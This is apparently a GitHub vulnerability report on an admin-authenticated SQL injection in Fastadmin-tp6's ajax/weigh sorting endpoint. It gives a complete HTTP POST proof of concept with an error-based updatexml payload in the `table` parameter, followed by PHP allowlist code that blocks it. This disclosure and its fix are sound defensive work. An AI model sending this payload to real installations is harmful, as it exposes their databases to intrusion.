Fastadmin-tp6 SQL injection #2

Open
0xzmz opened this issue Dec 30, 2019 · 0 comments


0xzmz commented Dec 30, 2019

When a user with administrator rights has logged in to the backend, SQL injection can be performed during sorting by constructing malicious data.
In file app/admin/controller/Ajax.php line 145, the 'table' parameter passed in here is not filtered, so we can pass a malicious parameter for SQL injection.
POC:

POST /admin/ajax/weigh HTTP/1.1
Host: ***.***
Connection: close
Content-Length: 122
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9


ids=1&changeid=8&pid=3&field=weigh&orderway=desc&table=user_rule where if(1=2,1,updatexml(1,concat(0x7e,user(),0x7e),1))--

Example (screenshot): Fastadmin SQL Injection
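One way to close the hole the report describes is to stop treating `table` as free text and accept only a registered identifier before it reaches the query. The snippet below is an added example, not Fastadmin's or ThinkPHP's own code; the allowlist contents and the function name are assumptions for the demonstration.

```php
<?php
// Added example, not Fastadmin's own code: validate the `table` parameter from
// the weigh/sort request before it is placed in SQL. The allowlist contents
// and the function name here are assumptions for the demonstration.

/**
 * Return $table, backtick-quoted, if it is a bare identifier on the allowlist;
 * otherwise throw. A bare identifier cannot carry spaces, quotes, parentheses
 * or "--", so the injected "where if(...)" suffix from the report cannot pass.
 */
function sortableTable(string $table, array $allowedTables): string
{
    if (!preg_match('/^[A-Za-z][A-Za-z0-9_]{0,63}$/', $table)) {
        throw new InvalidArgumentException('table is not a plain identifier');
    }
    // Strict exact match: a well-formed name is still rejected unless the
    // application has registered it as sortable.
    if (!in_array($table, $allowedTables, true)) {
        throw new InvalidArgumentException('table is not sortable');
    }
    // Quote the validated identifier so it is used only as a name in the SQL.
    return '`' . $table . '`';
}

// Constructed allowlist for the demonstration.
$allowedTables = ['user_rule', 'auth_group', 'category'];

// Constructed inputs: a legitimate value, the shape of the report's payload,
// and a well-formed name that is not registered as sortable.
$inputs = [
    'user_rule',
    'user_rule where if(1=2,1,updatexml(1,concat(0x7e,user(),0x7e),1))--',
    'admin',
];

foreach ($inputs as $table) {
    try {
        $name = sortableTable($table, $allowedTables);
        echo "accepted: $name\n";
    } catch (InvalidArgumentException $e) {
        echo "rejected ({$e->getMessage()}): $table\n";
    }
}
```

Only the first input is accepted; the same identifier check belongs on any other request value that ends up as a table or column name rather than as a bound parameter.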
